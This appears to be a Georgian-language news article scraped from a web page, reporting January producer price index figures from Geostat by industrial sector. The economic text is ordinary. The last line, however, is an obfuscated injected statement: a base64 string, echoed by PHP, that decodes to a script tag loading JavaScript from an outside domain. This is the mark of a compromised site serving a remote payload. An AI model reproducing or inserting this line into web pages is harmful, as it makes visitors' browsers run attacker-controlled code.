celsiusi
ავერსი jaluzi

იანვარში პროდუქციის წარმოება, როგორც თვის, ასევე წლის ჭრილში გაძვირდა.

საქსტატის მიერ გამოქვეყნებული სამრეწველო პროდუქციის მწარმოებელთა ფასების ინდექსის მიხედვით, ინდექსი წინა თვესთან შედარებით 1%-ით გაიზარდა, ხოლო წინა წლის შესაბამის თვესთან შედარებით ინდექსის 7.2%-იანი მატება ფიქსირდება.

12-თვიან პერიოდში ინდექსის ფორმირებაზე ძირითადი გავლენა იქონია ფასების ცვლილებამ შემდეგ პროდუქტებზე:

სამთო-მოპოვებითი მრეწველობა და კარიერების დამუშავება: ფასები გაზრდილია 24.1%-ით, რაც მთლიანი ინდექსის ცვლილებაზე 1.36 პროცენტული პუნქტით აისახა. ჯგუფში აღსანიშნავია ფასების მატება ლითონის მადნებზე (28%);
დამამუშავებელი მრეწველობის პროდუქცია: ფასები გაიზარდა 6.1%-ით, რამაც მთლიანი ინდექსის ზრდაზე 4.89 პროცენტული პუნქტით მოახდინა გავლენა. ფასები გაიზარდა შემდეგ ქვეჯგუფებზე: სასმელებზე (8.8%) და ძირითად ლითონებზე (14.9%);
ელექტროენერგია, აირი, ორთქლი და კონდიცირებული ჰაერი: ფასები გაიზარდა 8%-ით, რამაც მთლიანი ინდექსის წლიურ ცვლილებაზე 0.87 პროცენტული პუნქტით იქონია გავლენა;
წყალმომარაგება, კანალიზაცია, მომსახურება ნარჩენების მართვით და რეკულტივირებით: ფასები გაიზარდა 2.5%-ით, რამაც მთლიან ინდექსზე 0.06 პროცენტული პუნქტით იქონია გავლენა.
2024 წლის დეკემბერთან შედარებით კი, ფასები 3.8%-ით შემცირდა სამთო-მოპოვებითი მრეწველობისა და კარიერების დამუშავების ჯგუფზე, რამაც -0.24 პროცენტული პუნქტით იქონია ზეგავლენა ჯამური ინდექსის ცვლილებაზე. ამავე პერიოდში ფასები გაიზარდა დამამუშავებელი მრეწველობის პროდუქციის ჯგუფზე (0.9%), რამაც 0.69 პროცენტული პუნქტი შეიტანა მთლიანი ინდექსის ცვლილებაში.

ჯგუფში შემავალი პროდუქტებიდან აღსანიშნავია ფასების ზრდა კვების პროდუქტებზე (0.7%) და ძირითად ქიმიურ ნივთიერებებზე და ქიმიურ პროდუქტებზე (5.2%).

გარდა ამისა, ფასების 5.3%-იანი ზრდა დაფიქსირდა ელექტროენერგიის, აირის, ორთქლის და კონდიცირებული ჰაერის ჯგუფზე, რომლის წვლილმაც თვის ჯამური ინდექსის ცვლილებაში 0.55 პროცენტული პუნქტი შეადგინა.

202
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");